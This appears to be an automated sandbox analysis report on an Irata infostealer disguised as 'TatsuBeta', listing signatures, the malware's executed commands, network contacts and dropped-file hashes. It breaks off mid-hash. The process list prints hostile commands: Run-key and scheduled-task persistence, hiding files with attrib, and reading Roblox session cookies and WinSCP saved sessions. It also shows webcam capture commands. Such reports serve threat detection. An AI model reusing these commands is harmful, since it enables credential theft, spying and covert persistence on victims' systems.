Malware Analysis Report

2025-01-19 06:21

Sample ID 231217-q3mdbagaa4
Target TatsuBeta.rar
SHA256 dbbe13e230bf1aafd6069a339fd939e22d272215bf934f763cb1cd3ebe780331
Tags
irata infostealer persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

dbbe13e230bf1aafd6069a339fd939e22d272215bf934f763cb1cd3ebe780331

Threat Level: Known bad

The file TatsuBeta.rar was found to be: Known bad.

Malicious Activity Summary

irata infostealer persistence rat spyware stealer trojan

Irata

Irata payload

Executes dropped EXE

Checks computer location settings

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Drops autorun.inf file

Unsigned PE

Enumerates physical storage devices

Collects information from the system

Views/modifies file attributes

Detects videocard installed

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Creates scheduled task(s)

Enumerates processes with tasklist

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-17 13:48

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-17 13:47

Reported

2023-12-17 13:51

Platform

win10-20231215-en

Max time kernel

9s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1396 --field-trial-handle=1652,13412817415759078852,13694651141791906938,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1828 --field-trial-handle=1652,13412817415759078852,13694651141791906938,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=4576 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4576 get ExecutablePath"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\net.exe

net session

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=4576 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4576 get ExecutablePath"

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetup0Sf6pY /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetup0Sf6pY /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetup0Sf6pY /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetup0Sf6pY /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\" /F /rl highest"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetup0Sf6pY /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe\"""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\MVb3MPJhfaLX9RxrJiQ8\System\cam.4932_Admin"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\MVb3MPJhfaLX9RxrJiQ8\System\cam.4932_Admin.jpg"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_0Sf6pY.vbs\"""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_0Sf6pY.vbs\""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_0Sf6pY /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_0Sf6pY.vbs /f"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_0Sf6pY /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_0Sf6pY.vbs /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_0Sf6pY.vbs

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3540 --field-trial-handle=1652,13412817415759078852,13694651141791906938,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 4.200.250.142.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.8.8:53 api.gofile.io udp
FR 51.38.43.18:443 api.gofile.io tcp
US 8.8.8.8:53 store6.gofile.io udp
US 136.175.8.205:443 store6.gofile.io tcp
US 8.8.8.8:53 18.43.38.51.in-addr.arpa udp
US 8.8.8.8:53 hawkish.eu udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 205.8.175.136.in-addr.arpa udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
DE 140.82.121.4:443 github.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 96.121.5.163.in-addr.arpa udp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp

Files

\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\d3dcompiler_47.dll

MD5 47ae1c5ba5cd7260d633b31c09c1afd7
SHA1 69a007c2673b5af77d3ece4b771d4592b12b856d
SHA256 4940054c20bc1f9e2f279cb01808d2b70b21e6c449bb2a6acd5637dd445a8509
SHA512 6968935aa9f697bd2a2f06c915b3e792eae69a4de3963505986c9b5c7a3acf53b2aee25bc9ddb1e4469b54c272b29aa84c1e0ed748d0eb40b84cb95537ea2be9

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\ffmpeg.dll

MD5 df12826da5c11a8ec042d6fb4ca0155b
SHA1 cfbf71d518256d3d2d972dd46743a5192d5a2925
SHA256 e5fde93ae77e5eaa8e92abf944abc42cb13dc1b0667be36c304ffada8b568449
SHA512 d271338840261202aee4d7a23c30beeefe16cce6e34b661a80200773747ff61771f52b6a3833ea9f9f2e827444ac4f1bcfebea7630c8cee9b9206e50e442116a

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\libGLESv2.dll

MD5 e9b62b43a258a36e13848f7220afd8e6
SHA1 a9405f2a6219901572badee6433bd088cceb1b98
SHA256 4015b320cddc658d218de69f9a97aae89ef5813287d383aab65cd4c7589c0694
SHA512 5c13674dd9a0ee37936c010c0f34a47200dbc316214d1ec20ebf690be6d6b3f2648a057a433faa2ba2744f1aa47cb65c34f7627f56a0e6b23b866056f9927c78

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\libEGL.dll

MD5 cf52f8f071804255685c1f26bbea7f54
SHA1 ccf889a841dfea638477a98363ab26602225c21f
SHA256 2b61c328d9424689a03cb61fcc4436f41a7d5005d7b5156356a2a884b8ad24fc
